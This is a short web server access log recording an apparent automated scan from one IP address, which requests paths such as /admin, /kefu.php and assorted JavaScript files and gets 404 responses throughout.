123.58.210.165 - - [06/Nov/2021:14:10:19 +0100] "GET /kefu.php HTTP/1.1" 404 313 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:19 +0100] "GET /step1.asp HTTP/1.1" 404 314 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:19 +0100] "GET /mtja.html HTTP/1.1" 404 314 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:19 +0100] "GET /style.css HTTP/1.1" 404 314 "-" "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:19 +0100] "GET /getLocale HTTP/1.1" 404 314 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:23 +0100] "GET /admin HTTP/1.1" 404 310 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:23 +0100] "GET /api/linkPF HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:25 +0100] "GET /css/app.css HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:26 +0100] "GET /myConfig.js HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:26 +0100] "GET /js/home.js HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:28 +0100] "GET /css/all.css HTTP/1.1" 404 316 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:29 +0100] "GET /proxy/games HTTP/1.1" 404 316 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:29 +0100] "GET /js/pups.js HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:29 +0100] "GET /mh/phone.do HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
123.58.210.165 - - [06/Nov/2021:14:10:31 +0100] "GET /js/dianzan.js HTTP/1.1" 404 318 "-" "okhttp/3.3.1"
123.58.210.165 - - [06/Nov/2021:14:10:32 +0100] "GET /fePublicInfo/ HTTP/1.1" 404 318 "-" "okhttp/3.3.1"
